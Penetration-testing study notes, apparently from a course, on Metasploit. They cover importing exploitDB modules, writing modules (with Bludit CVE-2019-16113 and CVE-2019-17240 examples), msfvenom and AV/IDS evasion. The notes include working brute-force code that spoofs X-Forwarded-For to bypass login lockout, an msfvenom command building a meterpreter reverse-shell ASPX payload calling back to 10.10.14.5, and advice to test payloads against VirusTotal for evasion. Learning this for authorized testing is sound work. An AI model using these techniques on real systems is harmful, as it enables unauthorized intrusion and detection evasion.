7 - Additional Features

# Importing a Module - exploitDB may have custom exploits not found in MSF - if the MSF filter is selected, only scripts that areavailable in Metasploit module format wiull be shown - `searchsploit` is a command-line version of exploitDB - to import a script: save script as an `.rb` file and copy to `/usr/share/metasploit-framework/modules` - then run `msfconsole` and `reload_all` - `search <name>` or `use exploit/path_xxx` # Writing a Module ## Proof-of-Concept (POC) - Requirements ```ruby ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient #provides methods for acting as an HTTP client when exploiting an HTTP server. include Msf::Exploit::PhpEXE #method for generating a first-stage php payload include Msf::Exploit::FileDropper #method htat transfers files and handles clean-up after the session is established include Msf::Auxiliary::Report #methods for reporting data to the MSF DB ``` ## POC - Module Info ```ruby def initialize(info={}) super(update_info(info, 'Name' => "Bludit Directory Traversal Image File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability in Bludit. A remote user could abuse the uuid parameter in the image upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check to finally get remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'christasa', # Original discovery 'sinn3r' # Metasploit module ], 'References' => [ ['CVE', '2019-16113'], ['URL', 'https://github.com/bludit/bludit/issues/1081'], ['URL', 'https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Targets' => [ [ 'Bludit v3.9.2', {} ] ], 'Privileged' => false, 'DisclosureDate' => "2019-09-07", 'DefaultTarget' => 0)) ``` ## POC - Functions ```ruby register_options( [ OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']), OptString.new('BLUDITUSER', [true, 'The username for Bludit']), OptString.new('BLUDITPASS', [true, 'The password for Bludit']) ]) end ``` ## POC -Full Code ```ruby ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => "Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass", 'Description' => %q{ Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of the anti-brute force mechanism that is in place to block users that have attempted to login incorrectly ten times or more. Within the bl-kernel/security.class.php file, a function named getUserIp attempts to determine the valid IP address of the end-user by trusting the X-Forwarded-For and Client-IP HTTP headers. }, 'License' => MSF_LICENSE, 'Author' => [ 'rastating', # Original discovery '0ne-nine9' # Metasploit module ], 'References' => [ ['CVE', '2019-17240'], ['URL', 'https://rastating.github.io/bludit-brute-force-mitigation-bypass/'], ['PATCH', 'https://github.com/bludit/bludit/pull/1090' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Targets' => [ [ 'Bludit v3.9.2', {} ] ], 'Privileged' => false, 'DisclosureDate' => "2019-10-05", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']), OptString.new('BLUDITUSER', [true, 'The username for Bludit']), OptPath.new('PASSWORDS', [ true, 'The list of passwords', File.join(Msf::Config.data_directory, "wordlists", "passwords.txt") ]) ]) end # -- Exploit code -- # # dirty workaround to remove this warning: # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. # see https://github.com/nahi/httpclient/issues/252 class WebAgent class Cookie < HTTP::Cookie def domain self.original_domain end end end def get_csrf(client, login_url) res = client.get(login_url) csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] end def auth_ok?(res) HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location']) end def bruteforce_auth(client, host, username, wordlist) login_url = host + '/admin/login' File.foreach(wordlist).with_index do |password, i| password = password.chomp csrf_token = get_csrf(client, login_url) headers = { 'X-Forwarded-For' => "#{i}-#{password[..4]}", } data = { 'tokenCSRF' => csrf_token, 'username' => username, 'password' => password, } puts "[*] Trying password: #{password}" auth_res = client.post(login_url, data, headers) if auth_ok?(auth_res) puts "\n[+] Password found: #{password}" break end end end #begin # args = Docopt.docopt(doc) # pp args if args['--debug'] # # clnt = HTTPClient.new # bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--#wordlist']) #rescue Docopt::Exit => e # puts e.message #end ``` # MSFVENOM - `MSFVenom` is the result of the marriage between these two tools. Before this tool, we had to pipe (`|`) the result from `MSFPayload`, which was used to generate shellcode for a specific processor architecture and OS release, into `MSFEncode`, which contained multiple encoding schemes used both for removing bad characters from shellcode (this could sometimes cause instability during the runtime), and for evading older Anti-Virus (`AV`) and endpoint Intrusion Prevention / Intrusion Detection (`IPS/IDS`) software ```bash #generating a payload with msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx ``` # FW AND IDS-IPS EVASION - Endpoint protection refers to any localized device or service whose sole purpose is to protect a single host on the network - Perimeter protection usually comes in physical or virtualized devices on the network perimeter edge - Security policies are the drive behind every well-maintained security posture of any network - Security policies fdunction similar to ACLs |**Security Policy**|**Description**| |---|---| |`Signature-based Detection`|The operation of packets in the network and comparison with pre-built and pre-ordained attack patterns known as signatures. Any 100% match against these signatures will generate alarms.| |`Heuristic / Statistical Anomaly Detection`|Behavioral comparison against an established baseline included modus-operandi signatures for known APTs (Advanced Persistent Threats). The baseline will identify the norm for the network and what protocols are commonly used. Any deviation from the maximum threshold will generate alarms.| |`Stateful Protocol Analysis Detection`|Recognizing the divergence of protocols stated by event comparison using pre-built profiles of generally accepted definitions of non-malicious activity.| |`Live-monitoring and Alerting (SOC-based)`|A team of analysts in a dedicated, in-house, or leased SOC (Security Operations Center) use live-feed software to monitor network activity and intermediate alarming systems for any potential threats, either deciding themselves if the threat should be actioned upon or letting the automated mechanisms take action instead.| ## Evasion Techniques - Most host-based AV relies mainly on signature-based Detection to identify aspects of malicious code present in a software sample - encoders and encrypted tunnels (like meterpreter) can defeat signature -based detection - test payloads against `virustotal` for evasion ```bash msf-virustotal -k <API key> -f test2 ```